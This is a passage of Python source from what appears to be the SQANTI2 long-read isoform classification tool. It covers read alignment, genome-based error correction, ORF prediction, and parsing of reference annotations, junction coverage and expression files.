from BED import LazyBEDPointReader
import coordinate_mapper as cordmap
except ImportError:
print("Unable to import err_correct_w_genome or sam_to_gff3.py! Please make sure cDNA_Cupcake/sequence/ is in $PYTHONPATH.", file=sys.stderr)
sys.exit(-1)
try:
from cupcake.tofu.compare_junctions import compare_junctions
from cupcake.tofu.filter_away_subset import read_count_file
from cupcake.io.BioReaders import GMAPSAMReader
from cupcake.io.GFF import collapseGFFReader, write_collapseGFF_format
except ImportError:
print("Unable to import cupcake.tofu! Please make sure you install cupcake.", file=sys.stderr)
sys.exit(-1)
# check cupcake version
import cupcake
v1, v2 = [int(x) for x in cupcake.__version__.split('.')[:2]]
if v1 < 8 or (v1 == 8 and v2 < 6):
print("Cupcake version must be 8.6 or higher! Got {0} instead.".format(cupcake.__version__), file=sys.stderr)
sys.exit(-1)
GMAP_CMD = "gmap --cross-species -n 1 --max-intronlength-middle=2000000 --max-intronlength-ends=2000000 -L 3000000 -f samse -t {cpus} -D {dir} -d {name} -z {sense} {i} > {o}"
#MINIMAP2_CMD = "minimap2 -ax splice --secondary=no -C5 -O6,24 -B4 -u{sense} -t {cpus} {g} {i} > {o}"
MINIMAP2_CMD = "minimap2 -ax splice --secondary=no -C5 -u{sense} -t {cpus} {g} {i} > {o}"
DESALT_CMD = "deSALT aln {dir} {i} -t {cpus} -x ccs -o {o}"
GMSP_PROG = os.path.join(utilitiesPath, "gmst", "gmst.pl")
GMST_CMD = "perl " + GMSP_PROG + " -faa --strand direct --fnn --output {o} {i}"
GTF2GENEPRED_PROG = "gtfToGenePred"
GFFREAD_PROG = "gffread"
if distutils.spawn.find_executable(GTF2GENEPRED_PROG) is None:
print("Cannot find executable {0}. Abort!".format(GTF2GENEPRED_PROG), file=sys.stderr)
sys.exit(-1)
if distutils.spawn.find_executable(GFFREAD_PROG) is None:
print("Cannot find executable {0}. Abort!".format(GFFREAD_PROG), file=sys.stderr)
sys.exit(-1)
seqid_rex1 = re.compile(r'PB\.(\d+)\.(\d+)$')
seqid_rex2 = re.compile(r'PB\.(\d+)\.(\d+)\|\S+')
seqid_fusion = re.compile(r"PBfusion\.(\d+)")
FIELDS_JUNC = ['isoform', 'chrom', 'strand', 'junction_number', 'genomic_start_coord',
'genomic_end_coord', 'transcript_coord', 'junction_category',
'start_site_category', 'end_site_category', 'diff_to_Ref_start_site',
'diff_to_Ref_end_site', 'bite_junction', 'splice_site', 'canonical',
'RTS_junction', 'indel_near_junct',
'phyloP_start', 'phyloP_end', 'sample_with_cov', "total_coverage"] #+coverage_header
FIELDS_CLASS = ['isoform', 'chrom', 'strand', 'length', 'exons', 'structural_category',
'associated_gene', 'associated_transcript', 'ref_length', 'ref_exons',
'diff_to_TSS', 'diff_to_TTS', 'diff_to_gene_TSS', 'diff_to_gene_TTS',
'subcategory', 'RTS_stage', 'all_canonical',
'min_sample_cov', 'min_cov', 'min_cov_pos', 'sd_cov', 'FL', 'n_indels',
'n_indels_junc', 'bite', 'iso_exp', 'gene_exp', 'ratio_exp',
'FSM_class', 'coding', 'ORF_length', 'CDS_length', 'CDS_start',
'CDS_end', 'CDS_genomic_start', 'CDS_genomic_end', 'predicted_NMD',
'perc_A_downstream_TTS', 'seq_A_downstream_TTS',
'dist_to_cage_peak', 'within_cage_peak',
'dist_to_polya_site', 'within_polya_site',
'polyA_motif', 'polyA_dist']
RSCRIPTPATH = distutils.spawn.find_executable('Rscript')
RSCRIPT_REPORT = 'SQANTI_report2.R'
if RSCRIPTPATH is None or os.system(RSCRIPTPATH + " --version")!=0:
print("Rscript executable not found! Abort!", file=sys.stderr)
sys.exit(-1)
SPLIT_ROOT_DIR = 'splits/'
class genePredReader(object):
def __init__(self, filename):
self.f = open(filename)
def __iter__(self):
return self
def __next__(self):
line = self.f.readline().strip()
if len(line) == 0:
raise StopIteration
return genePredRecord.from_line(line)
class genePredRecord(object):
def __init__(self, id, chrom, strand, txStart, txEnd, cdsStart, cdsEnd, exonCount, exonStarts, exonEnds, gene=None):
self.id = id
self.chrom = chrom
self.strand = strand
self.txStart = txStart # 1-based start
self.txEnd = txEnd # 1-based end
self.cdsStart = cdsStart # 1-based start
self.cdsEnd = cdsEnd # 1-based end
self.exonCount = exonCount
self.exonStarts = exonStarts # 0-based starts
self.exonEnds = exonEnds # 1-based ends
self.gene = gene
self.length = 0
self.exons = []
for s,e in zip(exonStarts, exonEnds):
self.length += e-s
self.exons.append(Interval(s, e))
# junctions are stored (1-based last base of prev exon, 1-based first base of next exon)
self.junctions = [(self.exonEnds[i],self.exonStarts[i+1]) for i in range(self.exonCount-1)]
@property
def segments(self):
return self.exons
@classmethod
def from_line(cls, line):
raw = line.strip().split('\t')
return cls(id=raw[0],
chrom=raw[1],
strand=raw[2],
txStart=int(raw[3]),
txEnd=int(raw[4]),
cdsStart=int(raw[5]),
cdsEnd=int(raw[6]),
exonCount=int(raw[7]),
exonStarts=[int(x) for x in raw[8][:-1].split(',')], #exonStarts string has extra , at end
exonEnds=[int(x) for x in raw[9][:-1].split(',')], #exonEnds string has extra , at end
gene=raw[11] if len(raw)>=12 else None,
)
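# Illustrative genePredExt line parsed by from_line (tab-separated, hypothetical values;
# fields: name, chrom, strand, txStart, txEnd, cdsStart, cdsEnd, exonCount, exonStarts, exonEnds, score, gene):
#   PB.1.1  chr1  +  11868  14409  11868  11868  3  11868,12612,13220,  12227,12721,14409,  0  GENE1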
def get_splice_site(self, genome_dict, i):
"""
Return the donor-acceptor site (ex: GTAG) for the i-th junction
:param i: 0-based junction index
:param genome_dict: dict of chrom --> SeqRecord
:return: splice site pattern, ex: "GTAG", "GCAG" etc
"""
assert 0 <= i < self.exonCount-1
d = self.exonEnds[i]
a = self.exonStarts[i+1]
seq_d = genome_dict[self.chrom].seq[d:d+2]
seq_a = genome_dict[self.chrom].seq[a-2:a]
if self.strand == '+':
return (str(seq_d)+str(seq_a)).upper()
else:
return (str(seq_a.reverse_complement())+str(seq_d.reverse_complement())).upper()
class myQueryTranscripts:
def __init__(self, id, tss_diff, tts_diff, num_exons, length, str_class, subtype=None,
genes=None, transcripts=None, chrom=None, strand=None, bite ="NA",
RT_switching ="????", canonical="NA", min_cov ="NA",
min_cov_pos ="NA", min_samp_cov="NA", sd ="NA", FL ="NA", FL_dict={},
nIndels ="NA", nIndelsJunc ="NA", proteinID=None,
ORFlen="NA", CDS_start="NA", CDS_end="NA",
CDS_genomic_start="NA", CDS_genomic_end="NA", is_NMD="NA",
isoExp ="NA", geneExp ="NA", coding ="non_coding",
refLen ="NA", refExons ="NA",
refStart = "NA", refEnd = "NA",
q_splicesite_hit = 0,
q_exon_overlap = 0,
FSM_class = None, percAdownTTS = None, seqAdownTTS=None,
dist_cage='NA', within_cage='NA',
dist_polya_site='NA', within_polya_site='NA',
polyA_motif='NA', polyA_dist='NA'):
self.id = id
self.tss_diff = tss_diff # distance to TSS of best matching ref
self.tts_diff = tts_diff # distance to TTS of best matching ref
self.tss_gene_diff = 'NA' # min distance to TSS of all genes matching the ref
self.tts_gene_diff = 'NA' # min distance to TTS of all genes matching the ref
self.genes = genes if genes is not None else []
self.AS_genes = set() # ref genes that are hit on the opposite strand
self.transcripts = transcripts if transcripts is not None else []
self.num_exons = num_exons
self.length = length
self.str_class = str_class # structural classification of the isoform
self.chrom = chrom
self.strand = strand
self.subtype = subtype
self.RT_switching= RT_switching
self.canonical = canonical
self.min_samp_cov = min_samp_cov
self.min_cov = min_cov
self.min_cov_pos = min_cov_pos
self.sd = sd
self.proteinID = proteinID
self.ORFlen = ORFlen
self.CDS_start = CDS_start
self.CDS_end = CDS_end
self.coding = coding
self.CDS_genomic_start = CDS_genomic_start # 1-based genomic coordinate of CDS start - strand aware
self.CDS_genomic_end = CDS_genomic_end # 1-based genomic coordinate of CDS end - strand aware
self.is_NMD = is_NMD # (TRUE,FALSE) for NMD if is coding, otherwise "NA"
self.FL = FL # count for a single sample
self.FL_dict = FL_dict # dict of sample -> FL count
self.nIndels = nIndels
self.nIndelsJunc = nIndelsJunc
self.isoExp = isoExp
self.geneExp = geneExp
self.refLen = refLen
self.refExons = refExons
self.refStart = refStart
self.refEnd = refEnd
self.q_splicesite_hit = q_splicesite_hit
self.q_exon_overlap = q_exon_overlap
self.FSM_class = FSM_class
self.bite = bite
self.percAdownTTS = percAdownTTS
self.seqAdownTTS = seqAdownTTS
self.dist_cage = dist_cage
self.within_cage = within_cage
self.within_polya_site = within_polya_site
self.dist_polya_site = dist_polya_site # distance to the closest polyA site (--polyA_peak, BEF file)
self.polyA_motif = polyA_motif
self.polyA_dist = polyA_dist # distance to the closest polyA motif (--polyA_motif_list, 6mer motif list)
def get_total_diff(self):
return abs(self.tss_diff)+abs(self.tts_diff)
def modify(self, ref_transcript, ref_gene, tss_diff, tts_diff, refLen, refExons):
self.transcripts = [ref_transcript]
self.genes = [ref_gene]
self.tss_diff = tss_diff
self.tts_diff = tts_diff
self.refLen = refLen
self.refExons = refExons
def geneName(self):
geneName = "_".join(set(self.genes))
return geneName
def ratioExp(self):
if self.geneExp == 0 or self.geneExp == "NA":
return "NA"
else:
ratio = float(self.isoExp)/float(self.geneExp)
return(ratio)
def CDSlen(self):
if self.coding == "coding":
return(str(int(self.CDS_end) - int(self.CDS_start) + 1))
else:
return("NA")
def __str__(self):
return "%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s" % (self.chrom, self.strand,
str(self.length), str(self.num_exons),
str(self.str_class), "_".join(set(self.genes)),
self.id, str(self.refLen), str(self.refExons),
str(self.tss_diff), str(self.tts_diff),
self.subtype, self.RT_switching,
self.canonical, str(self.min_samp_cov),
str(self.min_cov), str(self.min_cov_pos),
str(self.sd), str(self.FL), str(self.nIndels),
str(self.nIndelsJunc), self.bite, str(self.isoExp),
str(self.geneExp), str(self.ratioExp()),
self.FSM_class, self.coding, str(self.ORFlen),
str(self.CDSlen()), str(self.CDS_start), str(self.CDS_end),
str(self.CDS_genomic_start), str(self.CDS_genomic_end), str(self.is_NMD),
str(self.percAdownTTS),
str(self.seqAdownTTS),
str(self.dist_cage),
str(self.within_cage),
str(self.dist_polya_site),
str(self.within_polya_site),
str(self.polyA_motif),
str(self.polyA_dist))
def as_dict(self):
d = {'isoform': self.id,
'chrom': self.chrom,
'strand': self.strand,
'length': self.length,
'exons': self.num_exons,
'structural_category': self.str_class,
'associated_gene': "_".join(set(self.genes)),
'associated_transcript': "_".join(set(self.transcripts)),
'ref_length': self.refLen,
'ref_exons': self.refExons,
'diff_to_TSS': self.tss_diff,
'diff_to_TTS': self.tts_diff,
'diff_to_gene_TSS': self.tss_gene_diff,
'diff_to_gene_TTS': self.tts_gene_diff,
'subcategory': self.subtype,
'RTS_stage': self.RT_switching,
'all_canonical': self.canonical,
'min_sample_cov': self.min_samp_cov,
'min_cov': self.min_cov,
'min_cov_pos': self.min_cov_pos,
'sd_cov': self.sd,
'FL': self.FL,
'n_indels': self.nIndels,
'n_indels_junc': self.nIndelsJunc,
'bite': self.bite,
'iso_exp': self.isoExp,
'gene_exp': self.geneExp,
'ratio_exp': self.ratioExp(),
'FSM_class': self.FSM_class,
'coding': self.coding,
'ORF_length': self.ORFlen,
'CDS_length': self.CDSlen(),
'CDS_start': self.CDS_start,
'CDS_end': self.CDS_end,
'CDS_genomic_start': self.CDS_genomic_start,
'CDS_genomic_end': self.CDS_genomic_end,
'predicted_NMD': self.is_NMD,
'perc_A_downstream_TTS': self.percAdownTTS,
'seq_A_downstream_TTS': self.seqAdownTTS,
'dist_to_cage_peak': self.dist_cage,
'within_cage_peak': self.within_cage,
'dist_to_polya_site': self.dist_polya_site,
'within_polya_site': self.within_polya_site,
'polyA_motif': self.polyA_motif,
'polyA_dist': self.polyA_dist
}
for sample,count in self.FL_dict.items():
d["FL."+sample] = count
return d
class myQueryProteins:
def __init__(self, cds_start, cds_end, orf_length, proteinID="NA"):
self.orf_length = orf_length
self.cds_start = cds_start # 1-based start on transcript
self.cds_end = cds_end # 1-based end on transcript (stop codon), ORF is seq[cds_start-1:cds_end].translate()
self.cds_genomic_start = None # 1-based genomic start of ORF, if - strand, is greater than end
self.cds_genomic_end = None # 1-based genomic end of ORF
self.proteinID = proteinID
def rewrite_sam_for_fusion_ids(sam_filename):
seen_id_counter = Counter()
f = open(sam_filename+'.tmp', 'w')
for line in open(sam_filename):
if line.startswith('@'):
f.write(line)
else:
raw = line.strip().split('\t')
if not raw[0].startswith('PBfusion.'):
print("Expecting fusion ID format `PBfusion.X` but saw {0} instead. Abort!".format(raw[0]), file=sys.stderr)
sys.exit(-1)
seen_id_counter[raw[0]] += 1
raw[0] = raw[0] + '.' + str(seen_id_counter[raw[0]])
f.write("\t".join(raw) + '\n')
f.close()
os.rename(f.name, sam_filename)
return sam_filename
def write_collapsed_GFF_with_CDS(isoforms_info, input_gff, output_gff):
"""
Augment a collapsed GFF with CDS information
*NEW* Also, change the "gene_id" field to use the classification result
:param isoforms_info: dict of id -> QueryTranscript
:param input_gff: input GFF filename
:param output_gff: output GFF filename
"""
with open(output_gff, 'w') as f:
reader = collapseGFFReader(input_gff)
for r in reader:
r.geneid = isoforms_info[r.seqid].geneName() # set the gene name
s = isoforms_info[r.seqid].CDS_genomic_start # could be 'NA'
e = isoforms_info[r.seqid].CDS_genomic_end # could be 'NA'
r.cds_exons = []
if s!='NA' and e!='NA': # has ORF prediction for this isoform
if r.strand == '+':
assert s < e
s = s - 1 # make it 0-based
else:
assert e < s
s, e = e, s
s = s - 1 # make it 0-based
for i,exon in enumerate(r.ref_exons):
if exon.end > s: break
r.cds_exons = [Interval(s, min(e,exon.end))]
for exon in r.ref_exons[i+1:]:
if exon.start > e: break
r.cds_exons.append(Interval(exon.start, min(e, exon.end)))
write_collapseGFF_format(f, r)
def get_corr_filenames(args, dir=None):
d = dir if dir is not None else args.dir
corrPathPrefix = os.path.join(d, args.output)
corrGTF = corrPathPrefix +"_corrected.gtf"
corrSAM = corrPathPrefix +"_corrected.sam"
corrFASTA = corrPathPrefix +"_corrected.fasta"
corrORF = corrPathPrefix +"_corrected.faa"
return corrGTF, corrSAM, corrFASTA, corrORF
def get_class_junc_filenames(args, dir=None):
d = dir if dir is not None else args.dir
outputPathPrefix = os.path.join(d, args.output)
outputClassPath = outputPathPrefix + "_classification.txt"
outputJuncPath = outputPathPrefix + "_junctions.txt"
return outputClassPath, outputJuncPath
def correctionPlusORFpred(args, genome_dict):
"""
Use the reference genome to correct the sequences (unless a pre-corrected GTF is given)
"""
global corrORF
global corrGTF
global corrSAM
global corrFASTA
corrGTF, corrSAM, corrFASTA, corrORF = get_corr_filenames(args)
n_cpu = max(1, args.cpus // args.chunks)
# Step 1. IF GFF or GTF is provided, make it into a genome-based fasta
# IF sequence is provided, align as SAM then correct with genome
if os.path.exists(corrFASTA):
print("Error corrected FASTA {0} already exists. Using it...".format(corrFASTA), file=sys.stderr)
else:
if not args.gtf:
if os.path.exists(corrSAM):
print("Aligned SAM {0} already exists. Using it...".format(corrSAM), file=sys.stderr)
else:
if args.aligner_choice == "gmap":
print("****Aligning reads with GMAP...", file=sys.stdout)
cmd = GMAP_CMD.format(cpus=n_cpu,
dir=os.path.dirname(args.gmap_index),
name=os.path.basename(args.gmap_index),
sense=args.sense,
i=args.isoforms,
o=corrSAM)
elif args.aligner_choice == "minimap2":
print("****Aligning reads with Minimap2...", file=sys.stdout)
cmd = MINIMAP2_CMD.format(cpus=n_cpu,
sense=args.sense,
g=args.genome,
i=args.isoforms,
o=corrSAM)
elif args.aligner_choice == "deSALT":
print("****Aligning reads with deSALT...", file=sys.stdout)
cmd = DESALT_CMD.format(cpus=n_cpu,
dir=args.gmap_index,
i=args.isoforms,
o=corrSAM)
if subprocess.check_call(cmd, shell=True)!=0:
print("ERROR running alignment cmd: {0}".format(cmd), file=sys.stderr)
sys.exit(-1)
# if this is a fusion run, go in and change the IDs to reflect PBfusion.X.1, PBfusion.X.2...
if args.is_fusion:
corrSAM = rewrite_sam_for_fusion_ids(corrSAM)
# error correct the genome (input: corrSAM, output: corrFASTA)
err_correct(args.genome, corrSAM, corrFASTA, genome_dict=genome_dict)
# convert SAM to GFF --> GTF
convert_sam_to_gff3(corrSAM, corrGTF+'.tmp', source=os.path.basename(args.genome).split('.')[0]) # convert SAM to GFF3
cmd = "{p} {o}.tmp -T -o {o}".format(o=corrGTF, p=GFFREAD_PROG)
if subprocess.check_call(cmd, shell=True)!=0:
print("ERROR running cmd: {0}".format(cmd), file=sys.stderr)
sys.exit(-1)
else:
print("Skipping aligning of sequences because GTF file was provided.", file=sys.stdout)
ind = 0
with open(args.isoforms, 'r') as isoforms_gtf:
for line in isoforms_gtf:
if line[0] != "#" and len(line.split("\t"))!=9:
sys.stderr.write("\nERROR: input isoforms file with not GTF format.\n")
sys.exit()
elif len(line.split("\t"))==9:
ind += 1
if ind == 0:
print("WARNING: GTF has {0} no annotation lines.".format(args.isoforms), file=sys.stderr)
# GFF to GTF (in case the user provides gff instead of gtf)
corrGTF_tpm = corrGTF+".tmp"
try:
subprocess.call([GFFREAD_PROG, args.isoforms , '-T', '-o', corrGTF_tpm])
except (RuntimeError, TypeError, NameError):
sys.stderr.write('ERROR: File %s is not in GTF/GFF format.\n' % args.isoforms)
raise SystemExit(1)
# check if gtf chromosomes inside genome file
with open(corrGTF, 'w') as corrGTF_out:
with open(corrGTF_tpm, 'r') as isoforms_gtf:
for line in isoforms_gtf:
if line[0] != "#":
chrom = line.split("\t")[0]
type = line.split("\t")[2]
if chrom not in list(genome_dict.keys()):
sys.stderr.write("\nERROR: gtf \"%s\" chromosome not found in genome reference file.\n" % (chrom))
sys.exit()
elif type in ('transcript', 'exon'):
corrGTF_out.write(line)
os.remove(corrGTF_tpm)
if not os.path.exists(corrSAM):
sys.stdout.write("\nIndels will be not calculated since you ran SQANTI2 without alignment step (SQANTI2 with gtf format as transcriptome input).\n")
# GTF to FASTA
subprocess.call([GFFREAD_PROG, corrGTF, '-g', args.genome, '-w', corrFASTA])
# ORF generation
print("**** Predicting ORF sequences...", file=sys.stdout)
gmst_dir = os.path.join(os.path.abspath(args.dir), "GMST")
gmst_pre = os.path.join(gmst_dir, "GMST_tmp")
if not os.path.exists(gmst_dir):
os.makedirs(gmst_dir)
# sequence ID example: PB.2.1 gene_4|GeneMark.hmm|264_aa|+|888|1682
gmst_rex = re.compile(r'(\S+\t\S+\|GeneMark.hmm)\|(\d+)_aa\|(\S)\|(\d+)\|(\d+)')
orfDict = {} # GMST seq id --> myQueryProteins object
if args.skipORF:
print("WARNING: Skipping ORF prediction because user requested it. All isoforms will be non-coding!", file=sys.stderr)
elif os.path.exists(corrORF):
print("ORF file {0} already exists. Using it....".format(corrORF), file=sys.stderr)
for r in SeqIO.parse(open(corrORF), 'fasta'):
# now process ORFs into myQueryProtein objects
m = gmst_rex.match(r.description)
if m is None:
print("Expected GMST output IDs to be of format '<pbid> gene_4|GeneMark.hmm|<orf>_aa|<strand>|<cds_start>|<cds_end>' but instead saw: {0}! Abort!".format(r.description), file=sys.stderr)
sys.exit(-1)
orf_length = int(m.group(2))
cds_start = int(m.group(4))
cds_end = int(m.group(5))
orfDict[r.id] = myQueryProteins(cds_start, cds_end, orf_length, proteinID=r.id)
else:
cur_dir = os.path.abspath(os.getcwd())
os.chdir(args.dir)
cmd = GMST_CMD.format(i=corrFASTA, o=gmst_pre)
if subprocess.check_call(cmd, shell=True, cwd=gmst_dir)!=0:
print("ERROR running GMST cmd: {0}".format(cmd), file=sys.stderr)
sys.exit(-1)
os.chdir(cur_dir)
# Modifying ORF sequences by removing sequence before ATG
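# Worked example (hypothetical GMST peptide): if the reported ORF is 100 aa and its
# sequence starts "AALM...", the first 'M' is at index 3, so the trimmed ORF is
# 97 aa and cds_start moves 3*3 = 9 nt downstream; the ID line is rewritten to match.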
with open(corrORF, "w") as f:
for r in SeqIO.parse(open(gmst_pre+'.faa'), 'fasta'):
m = gmst_rex.match(r.description)
if m is None:
print("Expected GMST output IDs to be of format '<pbid> gene_4|GeneMark.hmm|<orf>_aa|<strand>|<cds_start>|<cds_end>' but instead saw: {0}! Abort!".format(r.description), file=sys.stderr)
sys.exit(-1)
id_pre = m.group(1)
orf_length = int(m.group(2))
orf_strand = m.group(3)
cds_start = int(m.group(4))
cds_end = int(m.group(5))
pos = r.seq.find('M')
if pos!=-1:
# must modify both the sequence ID and the sequence
orf_length -= pos
cds_start += pos*3
newid = "{0}|{1}_aa|{2}|{3}|{4}".format(id_pre, orf_length, orf_strand, cds_start, cds_end)
newseq = str(r.seq)[pos:]
orfDict[r.id] = myQueryProteins(cds_start, cds_end, orf_length, proteinID=newid)
f.write(">{0}\n{1}\n".format(newid, newseq))
else:
new_rec = r
orfDict[r.id] = myQueryProteins(cds_start, cds_end, orf_length, proteinID=r.id)
f.write(">{0}\n{1}\n".format(new_rec.description, new_rec.seq))
if len(orfDict) == 0:
print("WARNING: All input isoforms were predicted as non-coding", file=sys.stderr)
return(orfDict)
def reference_parser(args, genome_chroms):
"""
Read the reference GTF file
:param args:
:param genome_chroms: list of chromosome names from the genome fasta, used for sanity checking
:return: (refs_1exon_by_chr, refs_exons_by_chr, junctions_by_chr, junctions_by_gene, known_5_3_by_gene)
"""
global referenceFiles
referenceFiles = os.path.join(args.dir, "refAnnotation_"+args.output+".genePred")
print("**** Parsing Reference Transcriptome....", file=sys.stdout)
if os.path.exists(referenceFiles):
print("{0} already exists. Using it.".format(referenceFiles), file=sys.stdout)
else:
## gtf to genePred
if not args.geneid:
subprocess.call([GTF2GENEPRED_PROG, args.annotation, referenceFiles, '-genePredExt', '-allErrors', '-ignoreGroupsWithoutExons', '-geneNameAsName2'])
else:
subprocess.call([GTF2GENEPRED_PROG, args.annotation, referenceFiles, '-genePredExt', '-allErrors', '-ignoreGroupsWithoutExons'])
## parse reference annotation
# 1. ignore all miRNAs (< 200 bp)
# 2. separately store single exon and multi-exon references
refs_1exon_by_chr = defaultdict(lambda: IntervalTree()) #
refs_exons_by_chr = defaultdict(lambda: IntervalTree())
# store donors as the exon end (1-based) and acceptor as the exon start (0-based)
# will convert the sets to sorted list later
junctions_by_chr = defaultdict(lambda: {'donors': set(), 'acceptors': set(), 'da_pairs': set()})
# dict of gene name --> set of junctions (don't need to record chromosome)
junctions_by_gene = defaultdict(lambda: set())
# dict of gene name --> list of known begins and ends (begin always < end, regardless of strand)
known_5_3_by_gene = defaultdict(lambda: {'begin':set(), 'end': set()})
for r in genePredReader(referenceFiles):
if r.length < args.min_ref_len: continue # ignore miRNAs
if r.exonCount == 1:
refs_1exon_by_chr[r.chrom].insert(r.txStart, r.txEnd, r)
known_5_3_by_gene[r.gene]['begin'].add(r.txStart)
known_5_3_by_gene[r.gene]['end'].add(r.txEnd)
else:
refs_exons_by_chr[r.chrom].insert(r.txStart, r.txEnd, r)
# only store junctions for multi-exon transcripts
for d, a in r.junctions:
junctions_by_chr[r.chrom]['donors'].add(d)
junctions_by_chr[r.chrom]['acceptors'].add(a)
junctions_by_chr[r.chrom]['da_pairs'].add((d,a))
junctions_by_gene[r.gene].add((d,a))
known_5_3_by_gene[r.gene]['begin'].add(r.txStart)
known_5_3_by_gene[r.gene]['end'].add(r.txEnd)
# check that all genes' chromosomes are in the genome file
ref_chroms = set(refs_1exon_by_chr.keys()).union(list(refs_exons_by_chr.keys()))
diff = ref_chroms.difference(genome_chroms)
if len(diff) > 0:
print("WARNING: ref annotation contains chromosomes not in genome: {0}\n".format(",".join(diff)), file=sys.stderr)
# convert the content of junctions_by_chr to sorted list
for k in junctions_by_chr:
junctions_by_chr[k]['donors'] = list(junctions_by_chr[k]['donors'])
junctions_by_chr[k]['donors'].sort()
junctions_by_chr[k]['acceptors'] = list(junctions_by_chr[k]['acceptors'])
junctions_by_chr[k]['acceptors'].sort()
junctions_by_chr[k]['da_pairs'] = list(junctions_by_chr[k]['da_pairs'])
junctions_by_chr[k]['da_pairs'].sort()
return dict(refs_1exon_by_chr), dict(refs_exons_by_chr), dict(junctions_by_chr), dict(junctions_by_gene), dict(known_5_3_by_gene)
def isoforms_parser(args):
"""
Parse input isoforms (GTF) to dict (chr --> sorted list)
"""
global queryFile
queryFile = os.path.splitext(corrGTF)[0] +".genePred"
print("**** Parsing Isoforms....", file=sys.stderr)
# gtf to genePred
cmd = GTF2GENEPRED_PROG + " {0} {1} -genePredExt -allErrors -ignoreGroupsWithoutExons".format(\
corrGTF, queryFile)
if subprocess.check_call(cmd, shell=True)!=0:
print("ERROR running cmd: {0}".format(cmd), file=sys.stderr)
sys.exit(-1)
isoforms_list = defaultdict(lambda: []) # chr --> list to be sorted later
for r in genePredReader(queryFile):
isoforms_list[r.chrom].append(r)
for k in isoforms_list:
isoforms_list[k].sort(key=lambda r: r.txStart)
return isoforms_list
def STARcov_parser(coverageFiles): # only valid for non-strand-specific RNA-seq protocols.
"""
:param coverageFiles: comma-separated list of STAR junction output files or a directory containing junction files
:return: list of samples, dict of (chrom,strand) --> (0-based start, 1-based end) --> {dict of sample -> unique reads supporting this junction}
"""
cov_files = glob.glob(coverageFiles)
print("Input pattern: {0}. The following files found and to be read as junctions:\n{1}".format(\
coverageFiles, "\n".join(cov_files) ), file=sys.stderr)
cov_by_chrom_strand = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: 0)))
undefined_strand_count = 0
all_read = 0
samples = []
for file in cov_files:
prefix = os.path.basename(file[:file.rfind('.')]) # use this as sample name
samples.append(prefix)
for r in STARJunctionReader(file):
if r.strand == 'NA':
# undefined strand, so we put them in BOTH strands; otherwise we'd lose all non-canonical junctions from STAR
cov_by_chrom_strand[(r.chrom, '+')][(r.start, r.end)][prefix] = r.unique_count + r.multi_count
cov_by_chrom_strand[(r.chrom, '-')][(r.start, r.end)][prefix] = r.unique_count + r.multi_count
undefined_strand_count += 1
else:
cov_by_chrom_strand[(r.chrom, r.strand)][(r.start, r.end)][prefix] = r.unique_count + r.multi_count
all_read += 1
print("{0} junctions read. {1} junctions added to both strands because no strand information from STAR.".format(all_read, undefined_strand_count), file=sys.stderr)
return samples, cov_by_chrom_strand
EXP_KALLISTO_HEADERS = ['target_id', 'length', 'eff_length', 'est_counts', 'tpm']
EXP_RSEM_HEADERS = ['transcript_id', 'length', 'effective_length', 'expected_count', 'TPM']
def expression_parser(expressionFile):
"""
Currently accepts expression format: Kallisto or RSEM
:param expressionFile: Kallisto or RSEM
:return: dict of PBID --> TPM
"""
reader = DictReader(open(expressionFile), delimiter='\t')
if all(k in reader.fieldnames for k in EXP_KALLISTO_HEADERS):
print("Detected Kallisto expression format. Using 'target_id' and 'tpm' field.", file=sys.stderr)
name_id, name_tpm = 'target_id', 'tpm'
elif all(k in reader.fieldnames for k in EXP_RSEM_HEADERS):
print("Detected RSEM expression format. Using 'transcript_id' and 'TPM' field.", file=sys.stderr)
name_id, name_tpm = 'transcript_id', 'TPM'
else:
print("Expected Kallisto or RSEM file format from {0}. Abort!".format(expressionFile), file=sys.stderr)
exp_dict = {}
for r in reader:
exp_dict[r[name_id]] = float(r[name_tpm])
return exp_dict
def transcriptsKnownSpliceSites(refs_1exon_by_chr, refs_exons_by_chr, start_ends_by_gene, trec, genome_dict, nPolyA):
"""
:param refs_1exon_by_chr: dict of single exon references (chr -> IntervalTree)
:param refs_exons_by_chr: dict of multi exon references (chr -> IntervalTree)
:param trec: id record (genePredRecord) to be compared against reference
:param genome_dict: dict of genome (chrom --> SeqRecord)
:param nPolyA: window size to look for polyA
:return: myQueryTranscripts object that indicates the best reference hit
"""
def calc_overlap(s1, e1, s2, e2):
if s1=='NA' or s2=='NA': return 0
if s1 > s2:
s1, e1, s2, e2 = s2, e2, s1, e1
return max(0, min(e1,e2)-max(s1,s2))
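# e.g., calc_overlap(10, 20, 15, 30) == 5 (the overlap spans [15, 20)),
# and calc_overlap(10, 20, 25, 30) == 0 (disjoint intervals).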
def gene_overlap(ref1, ref2):
if ref1==ref2: return True # same gene, diff isoforms
# return True if the two reference genes overlap
s1, e1 = min(start_ends_by_gene[ref1]['begin']), max(start_ends_by_gene[ref1]['end'])
s2, e2 = min(start_ends_by_gene[ref2]['begin']), max(start_ends_by_gene[ref2]['end'])
        if s1 <= s2:
            return e1 > s2
        else:
            return e2 > s1
def calc_splicesite_agreement(query_exons, ref_exons):
q_sites = {}
for e in query_exons:
q_sites[e.start] = 0
q_sites[e.end] = 0
for e in ref_exons:
if e.start in q_sites: q_sites[e.start] = 1
if e.end in q_sites: q_sites[e.end] = 1
return sum(q_sites.values())
def calc_exon_overlap(query_exons, ref_exons):
q_bases = {}
for e in query_exons:
for b in range(e.start, e.end): q_bases[b] = 0
for e in ref_exons:
for b in range(e.start, e.end):
if b in q_bases: q_bases[b] = 1
return sum(q_bases.values())
def get_diff_tss_tts(trec, ref):
if trec.strand == '+':
diff_tss = trec.txStart - ref.txStart
diff_tts = ref.txEnd - trec.txEnd
else:
diff_tts = trec.txStart - ref.txStart
diff_tss = ref.txEnd - trec.txEnd
return diff_tss, diff_tts
def get_gene_diff_tss_tts(isoform_hit):
# now that we know the reference (isoform) it hits
# add the nearest start/end site for that gene (all isoforms of the gene)
nearest_start_diff, nearest_end_diff = float('inf'), float('inf')
for ref_gene in isoform_hit.genes:
for x in start_ends_by_gene[ref_gene]['begin']:
d = trec.txStart - x
if abs(d) < abs(nearest_start_diff):
nearest_start_diff = d
for x in start_ends_by_gene[ref_gene]['end']:
d = trec.txEnd - x
if abs(d) < abs(nearest_end_diff):
nearest_end_diff = d
if trec.strand == '+':
